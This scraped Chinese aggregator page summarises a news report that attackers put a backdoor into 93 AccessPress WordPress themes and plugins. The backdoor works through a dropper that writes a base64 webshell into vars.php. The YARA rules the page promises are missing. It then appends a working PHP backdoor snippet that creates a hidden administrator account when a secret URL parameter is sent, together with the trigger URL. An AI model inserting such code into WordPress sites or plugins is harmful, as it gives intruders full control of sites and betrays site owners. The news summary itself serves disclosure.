PHP的93个WordPress插件有后门

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP的93个WordPress插件有后门相关的知识,希望对你有一定的参考价值。

参考技术A 因为93 个 WordPress 主题和插件包含后门,从而使得攻击者可以完全控制网站。攻击者总共入侵了 AccessPress 的 40 个主题和 53 个插件,AccessPress 是 WordPress 插件的开发者,用于超过 360,000 个活动网站。

该攻击是由 Jetpack 的研究人员发现的,Jetpack 是 WordPress 网站安全和优化工具的创建者,他们发现 php 后门已被添加到主题和插件中。

Jetpack 认为外部威胁攻击者入侵了 AccessPress 网站以破坏软件并感染更多的 WordPress 网站。

一旦管理员在他们的网站上安装了一个受感染的 AccessPress 产品,就会在主主题目录中添加一个新的“initial.php”文件,并将其包含在主“functions.php”文件中。该文件包含一个 base64 编码的有效负载,它将 webshel l 写入“./wp-includes/vars.php”文件。恶意代码通过解码并将其注入“vars.php”文件来完成后门安装,实质上是让攻击者远程控制受感染的站点。

检测这种威胁的唯一方法是使用核心文件完整性监控解决方案,因为恶意软件会删除“initial.php”文件释放器以掩盖其踪迹。

我受到影响吗?

如果您在您的网站上安装了其中一个受感染的插件或主题,则删除/替换/更新它们不会根除任何可能通过它植入的 webshel l。

因此,建议网站管理员通过执行以下操作来扫描他们的网站是否存在入侵迹象:

Jetpack 提供了以下 YARA 规则,可用于检查站点是否已被感染并检测 dropper 和已安装的 webshel l:

原文链接:PHP的93个WordPress插件有后门

php Wordpress后门

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
        If ($_GET['backdoor'] == 'knockknock') {
                require('wp-includes/registration.php');
                If (!username_exists('username')) {
                        $user_id = wp_create_user('name', 'pass');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}
?>


// http://www.yourdomain.com/?backdoor=knockknock

以上是关于PHP的93个WordPress插件有后门的主要内容,如果未能解决你的问题,请参考以下文章

php Wordpress后门

猥琐的wordpress后门分享

assert一句话后门

assert一句话后门

[自己动手改wordpress.1]wordpress的插件User-Access-Manager在新的php版本号里面无法执行的bug.

创建 wordpress 插件时,如何在 jQuery 加载页面中启动挂钩?